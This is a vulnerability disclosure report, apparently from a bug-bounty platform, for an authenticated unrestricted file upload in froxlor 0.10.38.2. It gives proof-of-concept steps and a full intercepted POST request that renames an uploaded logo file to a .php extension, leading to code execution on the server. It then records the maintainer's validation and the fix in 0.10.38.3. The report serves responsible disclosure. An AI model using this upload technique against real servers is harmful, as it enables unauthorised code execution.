froxlor/froxlor <= 0.10.38.2 - Authenticated Unrestricted File Upload to RCE in froxlor/froxlor

Valid

Reported on

Nov 7th 2022


Description

Unsafe file uploads occur when the web server fails to sufficiently validate the file’s size, type, name, contents, or what restrictions are placed on the file once it has been successfully uploaded. The application fails to validate files that are uploaded, allowing an attacker to upload unsafe files to the web server and gain access to folders in a directory that are not intended to be accessed.

Proof of Concept

1. Enable a HTTP intercept proxy, such as Burp Suite.
2. Log in to the administrator account.
3. With the HTTP intercept proxy turned on, use a browser to navigate to: System -> Settings -> Panel settings.
4. At the position of Logo Image (Header) or Logo Image (Login) perform the upload function with the file s.jpg.

1

5. In the proxy software, catch the POST request sent to the /admin_settings.php, then change file extension from jpg to php. Finally, forward the request.

2 3

6. The result can be arbitrary code execution on the server.

4

Request

POST /admin_settings.php HTTP/1.1
Host: localhost:8001
Content-Length: 166194
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8001
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySYA7fVL8S7T9epDH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8001/admin_settings.php?page=overview&part=panel&s=3f573ee5ef049a0728ea376883d4d3d9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="send"

send
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="s"

3f573ee5ef049a0728ea376883d4d3d9
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="page"

overview
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="action"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_standardlanguage"

English
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_default_theme"

Sparkle
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_theme_change_customer"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_theme_change_customer"

1
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_theme_change_admin"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_theme_change_admin"

1
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_natsorting"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_natsorting"

1
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_paging"

20
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_pathedit"

Manual
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_adminmail"

admin@localhost
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_adminmail_defname"

Froxlor Administrator
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_adminmail_return"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_decimal_places"

4
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_phpmyadmin_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_webmail_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_webftp_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="admin_show_version_login"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="admin_show_version_footer"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="admin_show_news_feed"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="admin_show_news_feed"

1
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="customer_show_news_feed"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="customer_news_feed_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_domain_change_admin"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_domain_change_customer"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_phpconfigs_hidestdsubdomain"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_imprint_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_terms_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_privacy_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_logo_overridetheme"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_logo_overridecustom"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_logo_image_header"; filename="s.php"
Content-Type: image/jpeg

<image content>
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_logo_image_login"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="part"

panel
------WebKitFormBoundarySYA7fVL8S7T9epDH--

Impact

Unsafe file upload can lead to reputational damage for the business due to a loss in confidence from users who are attempting to perform legitimate actions within the application. It can also lead to indirect financial loss due to an attacker reading or manipulating files on the web server.

References

We are processing your report and will contact the froxlor team within 24 hours. 2 months ago
haidv modified the report
2 months ago
We have contacted a member of the froxlor team and are waiting to hear back 2 months ago
Michael Kaufmann validated this vulnerability 2 months ago

as per email upfront, thanks again for finding this. It will be resolved in the next release on 2nd of december

haidv has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
haidv
2 months ago

Researcher


Thanks. Can my vulnerability have bounty or CVE?

Michael Kaufmann marked this as fixed in 0.10.38.3 with commit 4d454a a month ago
Michael Kaufmann has been awarded the fix bounty
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Dec 3rd 2022
Michael Kaufmann published this vulnerability a month ago
haidv
a month ago

Researcher


May I ask why my report doesn't have CVE like other reports?

to join this conversation